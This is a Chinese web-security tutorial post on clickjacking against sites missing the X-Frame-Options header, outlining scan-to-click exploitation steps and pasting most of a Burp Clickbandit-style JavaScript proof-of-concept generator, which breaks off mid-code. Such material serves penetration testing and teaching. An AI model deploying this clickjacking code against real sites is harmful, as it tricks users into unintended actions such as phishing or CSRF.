【web-实战】点击劫持(缺失X-Frame-Options)

目录

一、简述:

二、利用

第一步:漏扫

第二步:劫持模板

第三步:配置劫持点

第四步:点击


一、简述:

1、点击劫持 (Clickjacking) 技术又称为界面伪装攻击 (UI redress attack ),是一种视觉上的欺骗手段

2、攻击者使用一个或多个透明的 iframe 覆盖在一个正常的网页上,然后诱使用户在该网页上进行操作,当用户在不知情的情况下点击透明的 iframe 页面时,用户的操作已经被劫持到攻击者事先设计好的恶意按钮或链接上

3、攻击者既可以通过点击劫持设计一个独立的恶意网站,执行钓鱼攻击等;也可以与 XSS 和 CSRF 攻击相结合,突破传统的防御措施,提升漏洞的危害程度



二、利用

第一步:漏扫

【web-实战】点击劫持(缺失X-Frame-Options)_第1张图片


第二步:劫持模板

【web-实战】点击劫持(缺失X-Frame-Options)_第2张图片

【web-实战】点击劫持(缺失X-Frame-Options)_第3张图片

/* Copyright PortSwigger Ltd. All rights reserved. Usage is subject to the Burp Suite license terms. See https://portswigger.net for more details. */
!function(){
	var initialZoomFactor = '1.0', win, doc, width, height, clicks = [];
	function addClickTrap(element, minusY) {
		var clickTrap = doc.createElement('div'), cords = findPos(element);
		clickTrap.style.backgroundColor = 'none';
		clickTrap.style.border = 'none';
		clickTrap.style.position = 'absolute';
		clickTrap.style.left = cords[0] + 'px';
		clickTrap.style.top = cords[1] + 'px';
		clickTrap.style.width = element.offsetWidth + 'px';
		clickTrap.style.height = element.offsetHeight + 'px';
		if(element.zIndex || element.zIndex === '0') {
			clickTrap.style.zIndex = +element.zIndex+1;
		}
		clickTrap.style.opacity = '0.5';
		clickTrap.style.cursor = 'pointer';
		clickTrap.clickTrap = 1;
		clickTrap.addEventListener('click', function(e) {
			generatePoc({x:e.pageX, y: minusY?e.pageY-minusY : e.page});
			e.preventDefault();
			e.stopPropagation();
			return false;
		}, true);
		doc.body.appendChild(clickTrap);
	}
	function addMessage(msg) {
		var message = document.createElement('div');
			message.style.width = '100%';
			message.style.height = '20px';
			message.style.backgroundColor = '#fff5bf';
    	message.style.border = '1px solid #ff9900';
    	message.style.padding = '5px';
    	message.style.position = 'fixed';
    	message.style.bottom = '0';
    	message.style.left = '0';
    	message.style.zIndex = 100000;
    	message.style.textAlign = 'center';
    	message.style.fontFamily = 'Arial';
    	message.style.color = '#000';
    	message.appendChild(document.createTextNode(msg));
    	document.body.appendChild(message);
    	setTimeout(function() {
    		document.body.removeChild(message);
    	}, 4000);
	}
	function htmlEscape(str) {
		str = str + '';
		return str.replace(/[^\w :\-\/.?=]/gi, function(c){
			return '&#' + (+c.charCodeAt(0))+';';
		});
	}
	function getDocHeight(D) {
	    return Math.max(
	        D.body.scrollHeight, D.documentElement.scrollHeight,
	        D.body.offsetHeight, D.documentElement.offsetHeight,
	        D.body.clientHeight, D.documentElement.clientHeight
	    );
	}
	function getDocWidth(D) {
		return Math.max(
			D.body.scrollWidth, D.documentElement.scrollWidth,
			D.body.offsetWidth, D.documentElement.offsetWidth,
			D.body.clientWidth, D.documentElement.clientWidth
		);
	}
	function findPos(obj) {
	    var left = 0, top = 0;
	    if(obj.offsetParent) {
	        while(1) {
	          left += obj.offsetLeft;
	          top += obj.offsetTop;
	          if(!obj.offsetParent) {
	            break;
	          }
	          obj = obj.offsetParent;
	        }
	    } else if(obj.x && obj.y) {
	        left += obj.x;
	        top += obj.y;
	    }
	    return [left,top];
  	}
	function generatePoc(config) {
		var html = '', child = '', elementWidth = 1, elementHeight = 1, maxWidth = width, maxHeight = height, cords, zoomIncrement = 1, desiredX = 200, desiredY = 200, parentOffsetWidth, parentOffsetHeight,
			element = config.element, x = config.x, y = config.y, pixelMode = false;
		if(config.clickTracking) {
			elementWidth = config.clickTracking[0].width;
			elementHeight = config.clickTracking[0].height;
			x = config.clickTracking[0].left;
			y = config.clickTracking[0].top;
			zoomIncrement = 1;
			config.currentPosition = 0;
		} else {
			config.clickTracking = [];
			if(element) {
				elementWidth = element.offsetWidth;
				elementHeight = element.offsetHeight;
				cords = findPos(element);
				x = cords[0];
				y = cords[1];
				zoomIncrement = 1;
			} else {
				zoomIncrement = 5;
				pixelMode = true;
			}
		}
		parentOffsetWidth = desiredX - x;
		parentOffsetHeight = desiredY - y;
		child = btoa('
                    
                    

你可能感兴趣的:(0X04【web实战】,web安全)